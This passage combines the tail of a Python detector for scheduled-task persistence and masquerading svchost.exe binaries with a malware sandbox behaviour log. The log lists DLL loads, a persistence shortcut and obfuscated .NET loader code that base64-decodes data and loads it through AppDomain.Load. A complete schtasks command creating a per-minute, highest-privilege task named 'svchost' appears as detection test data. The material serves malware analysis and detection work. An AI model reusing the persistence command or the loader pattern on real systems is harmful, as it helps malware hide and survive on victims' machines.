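     "cmdline": r'"C:\Users\user\Desktop\WV7Gj9lJ7W.exe"'},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 '
                r'/tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe"'},
    {"image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"image": r"C:\Users\user\AppData\Local\Temp\svchost.exe",
     "cmdline": r"C:\Users\user\AppData\Local\Temp\svchost.exe"},
    {"image": r"C:\Windows\System32\svchost.exe",              # constructed benign control
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
]


def schtasks_args(cmdline):
    """Map '/switch' -> value for a schtasks.exe command line; None if it is not schtasks."""
    # Non-POSIX mode keeps Windows backslashes and quoted paths intact.
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    if not tokens or PureWindowsPath(tokens[0]).name.lower() != "schtasks.exe":
        return None
    args, i = {}, 1
    while i < len(tokens):
        if tokens[i].startswith("/"):
            key = tokens[i][1:].lower()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                args[key] = tokens[i + 1]
                i += 2
                continue
            args[key] = True                 # bare switch such as /f or /create
        i += 1
    return args


def suspicious_task(args):
    """Reasons a task creation looks like malware persistence (empty list if none)."""
    if not args or "create" not in args or not isinstance(args.get("tr"), str):
        return []
    action = args["tr"].lower()
    reasons = []
    if any(d in action for d in USER_WRITABLE):
        reasons.append("action in user-writable path")
    if PureWindowsPath(action).name in SYSTEM_NAMES:
        reasons.append("action named like a system process")
    if str(args.get("sc", "")).lower() == "minute" and str(args.get("mo", "")) == "1":
        reasons.append("re-launch every minute")
    if str(args.get("rl", "")).upper() == "HIGHEST":
        reasons.append("highest run level")
    return reasons


def masquerading_image(image):
    """True when a system-process name executes outside System32/SysWOW64."""
    p = PureWindowsPath(image)
    return p.name.lower() in SYSTEM_NAMES and str(p.parent).lower() not in SYSTEM_DIRS


def scan(events=EVENTS):
    """Return [(image, [reasons])] for every event that trips a check."""
    findings = []
    for e in events:
        if masquerading_image(e["image"]):
            findings.append((e["image"], ["system process name outside System32/SysWOW64"]))
        reasons = suspicious_task(schtasks_args(e["cmdline"]))
        if reasons:
            findings.append((e["image"], reasons))
    return findings


if __name__ == "__main__":
    for image, reasons in scan():
        print(image, "->", "; ".join(reasons))
```

On a live host the same checks apply to the task definitions under C:\Windows\System32\Tasks, where the action path sits in the <Command> element of the task XML, and to the Startup folder, where the .lnk target should get the same user-writable-path test as the /tr argument.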
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exe | Section loaded: scrrun.dll
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: linkinfo.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: ntshrui.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: cscapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: avicap32.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: msvfw32.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                                  Source: svchost.lnk.0.drLNK file: ..\..\..\..\..\..\Local\Temp\svchost.exe
                                  Source: WV7Gj9lJ7W.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                  Source: WV7Gj9lJ7W.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                                  Data Obfuscation

                                   Source: WV7Gj9lJ7W.exe, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1.hFys3whJzriUf5ffzfq4sandjR0Z92w61Gcp3Yc68DtjQTN9aRSgWyhEzwDg,Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1.TdNnE5PTBxhagKPbAXYqgEqRuvCsrciyCd5wczJGARcQYOQNI4nybPVo9qdm,Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1._7ZXzm3PoEKGNeo868rQTBPBt7EFSfUj56oetzqNfT2KEVSBSppWtch2U62WQ,Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1.wMoBRJlmgtBr8JQshhrpOocFhX98AsHlGediDxukZblznU4AayL3CMwa2qdc,GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.asBqSKDtJW5J1besvqLIMYFLeyiattIOqvylViz8brRue5AKoSGlTw2O8oBY4S5LCMrcRc2tkYseA()}}, (string[])null, (Type[])null, (bool[])null, true)
                                   Source: WV7Gj9lJ7W.exe, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_4YAiW2j9vJzg72PzC2aZLmHIRxmbqWXZ3zH0rdzVGE5DZ[2],GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.exMiHafrLan5NN3O3Us5Z6wanpcHz3qAzqKm182BzZeQNSpLzgWeqX1SMdkMzRIu5a6EvZ1lu6dwC(Convert.FromBase64String(_4YAiW2j9vJzg72PzC2aZLmHIRxmbqWXZ3zH0rdzVGE5DZ[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                   Source: svchost.exe.0.dr, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1.hFys3whJzriUf5ffzfq4sandjR0Z92w61Gcp3Yc68DtjQTN9aRSgWyhEzwDg,Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1.TdNnE5PTBxhagKPbAXYqgEqRuvCsrciyCd5wczJGARcQYOQNI4nybPVo9qdm,Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1._7ZXzm3PoEKGNeo868rQTBPBt7EFSfUj56oetzqNfT2KEVSBSppWtch2U62WQ,Njv73KX784FjKnNf2Gc98sSHOj18YdGcf2Byy2gkbIZUXntiVeuAR0ax5pZ1.wMoBRJlmgtBr8JQshhrpOocFhX98AsHlGediDxukZblznU4AayL3CMwa2qdc,GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.asBqSKDtJW5J1besvqLIMYFLeyiattIOqvylViz8brRue5AKoSGlTw2O8oBY4S5LCMrcRc2tkYseA()}}, (string[])null, (Type[])null, (bool[])null, true)
                                   Source: svchost.exe.0.dr, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_4YAiW2j9vJzg72PzC2aZLmHIRxmbqWXZ3zH0rdzVGE5DZ[2],GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.exMiHafrLan5NN3O3Us5Z6wanpcHz3qAzqKm182BzZeQNSpLzgWeqX1SMdkMzRIu5a6EvZ1lu6dwC(Convert.FromBase64String(_4YAiW2j9vJzg72PzC2aZLmHIRxmbqWXZ3zH0rdzVGE5DZ[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                   Source: WV7Gj9lJ7W.exe, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs | .Net Code: VpeO8tTOEv4iDsN3sQAY1HlnIybRgPGr45wl2qtybq0GP System.AppDomain.Load(byte[])
                                   Source: WV7Gj9lJ7W.exe, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs | .Net Code: CjNu4V7rW7TNejKoUG6MzPu3LKIzheMmxW3F4jpogfZqh System.AppDomain.Load(byte[])
                                   Source: WV7Gj9lJ7W.exe, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs | .Net Code: CjNu4V7rW7TNejKoUG6MzPu3LKIzheMmxW3F4jpogfZqh
                                   Source: svchost.exe.0.dr, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs | .Net Code: VpeO8tTOEv4iDsN3sQAY1HlnIybRgPGr45wl2qtybq0GP System.AppDomain.Load(byte[])
                                   Source: svchost.exe.0.dr, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs | .Net Code: CjNu4V7rW7TNejKoUG6MzPu3LKIzheMmxW3F4jpogfZqh System.AppDomain.Load(byte[])
                                   Source: svchost.exe.0.dr, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.cs | .Net Code: CjNu4V7rW7TNejKoUG6MzPu3LKIzheMmxW3F4jpogfZqh
                                   Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 5_2_00007FFD9B8A00BD pushad ; iretd 5_2_00007FFD9B8A00C1
                                   Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 9_2_00007FFD9B8A00BD pushad ; iretd 9_2_00007FFD9B8A00C1
                                   Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 11_2_00007FFD9B8900BD pushad ; iretd 11_2_00007FFD9B8900C1
                                   Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 12_2_00007FFD9B8A00BD pushad ; iretd 12_2_00007FFD9B8A00C1
                                   Source: WV7Gj9lJ7W.exe, 27nQSNX0HYY6kClZEDjv.cs | High entropy of concatenated method names: 'ueqQqejJterhoHm1K1Jy', 'FeELXdV4V5TjgQQ6okzA', 'w56uiyv9mk97wBLCBUpy', 'wZVMIBp6mrg9dO2oZucojhhHDEWvqQZUHMRZI', 'Co7Gtn8ZvgJDb6ZvQf6LESdxREpOnkh1WZJvt', 'ElnyCMggM8MKTh0D6qPHPlDjBzxBnX7RL2uMz', 'GDsVpslrxrSf0fKTh6U10jwits0f29D58vgOm', 'UZCN52VB9MgUUWC5bR3jULzpLfWpKdBWNxSEl', '_4ymlMh3d0VjJ29vjUGQ5iZb5UZ12m4arohsYR', 'Xi13qzePlUtqsRazdJbJgFYSK916d3Z7Tm40S'
                                   Source: WV7Gj9lJ7W.exe, MX9MPbJBnyOxLe7MYhq37R4NjeJWR2ZJdXjYr4UsDzVbLrue6sPA1La6LKal.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'xo1kf4Jx30YPVKNDUt6W', 'FrCO0gWCI3Cc129MlUiJ', 'VCe1cecq1AUIncRNW2g0', 'kz8Gz8qF90ulGQNXgN7q'
                                   Source: WV7Gj9lJ7W.exe, 316U38w4QVmq2sHFnBvkd4LieyieRq76dn2Kimj2SAfAl.cs | High entropy of concatenated method names: 'hI9KT6csSEYaPv773xBYfKRtTKNVnU7dJn8Qp7EhP9o8D', 'lEZz5agvylve7hksOkLER989WBvtK7k47gcAiIoovQbyf2w8px3wk2BFpD6525UdCuvfpN2sgvMP00OCkrZ7K0hzO3EQqMa', 'qThp3Tnp9uL3mCcx2RKuJOmWtl45lRIvOF9dn1VfKP4GUZGNAE2peaPzu6ACiRMvAZijeLhApv2fylmlEDm0IpwTEDX49yl', '_8Ok5pYSWOD96ESoPqEFtnEDOaH6skpryUVavXewN6tTmHaUVo9u2GANNMKwoYypuNmSwcWOkHXOURN6CNuhWPnjxInE7uF8', '_6YuBy37IC7jwy9VRa0lxGiDaoZtqy93ayCJfcLWCuwbXmNIVfj3VIGIFyG3dOMObHLIc64sjxELzJ2fcJZ0tXMsTSoQ1G4v'
                                   Source: WV7Gj9lJ7W.exe, ake8eTev2BMeufFpdYvXz1rggei7SGsicHjO2bESD2ok5TLhCDsYXlIFx6fvqouj8uy8v8luRiBFk.cs | High entropy of concatenated method names: 'YYHDR1FlBjBxXOU39qSvS1EcsQh0tj8gM35gmXuZITmuiPk08Lm78xWkFCYLoEb3zCUSMok6n8Pz3', 'VDfFRo8LYl1tIXFA06Is3iUDeWnzk1ge8Klc9j3EikbSyEv5jSSlbeFcLIsx826PuEyDRYQKfK5yQ', 'tBSpzoYaZ38vEVkNARodMehzxQe0HGo9Fh3I2', 'c4mbtuvxK9W16V045BYBHgfKZc4cfE26553dq', 'uJ1TmU8R3cr3rAutD0RpanDoSqLqmjn0dnqog', '_3k0jFaralJt9bZKXRcPcjgCnPx3FPWpHraTEk'
                                   Source: WV7Gj9lJ7W.exe, cSNl319mLCwHfhwaDWRYhnKG8D3oxANewMPCBZ2pid1LPBXyU3ptz6Bh9XCQ5pUwwZOVIjaKEPlJe.cs | High entropy of concatenated method names: 'knTr5CJmVp8X9Ko4GZ7ckQNOEhaAynFQXlojQjbSxyl6OhyyDttZrHspfT6xQHm9BOS3diXSEYNSj', 'l66FIfebctAmOjmY7AtDWwoehjmyLESp9Q7ABrsRINsdXHbENH3vJWlYj8DmXd1gwPJS5erC32HOw', 'weMfLXyg4oTWv5b8kh8dYP2K7WshUjVvSn6AK6VNwu8umcIenO7s7tFITnWeBXfd48CZ5M3RLXIAU', 'rkq8Va3BA7apdfvH3rnX9doZlXOicZYXqnyfcDPvBeEls1t7ms86njfHIJOOSwsyr2B4JI4ugQHUY', 'qzBVRY0F1Da1G0Kepxt7anYKc5eHxOc6FffmL', 'TED3M9IaM0EnSj6YZgk3fv5dubsZ9Agoh3plW', 'Yk46pcnFd76Nc6AQvsO7LcEfWflt7KQyxFvcz', 'T66YrvMTGMmZQ8J0zkbd118JJVsitKhmjzGZm', 'VFlaKlbCgpAuH3kfCBnvtwECtfXz7cihAcr9M', 'XicSwzaAyuqo3OkjMsrJSrZFOEiadmmrqpZH1'
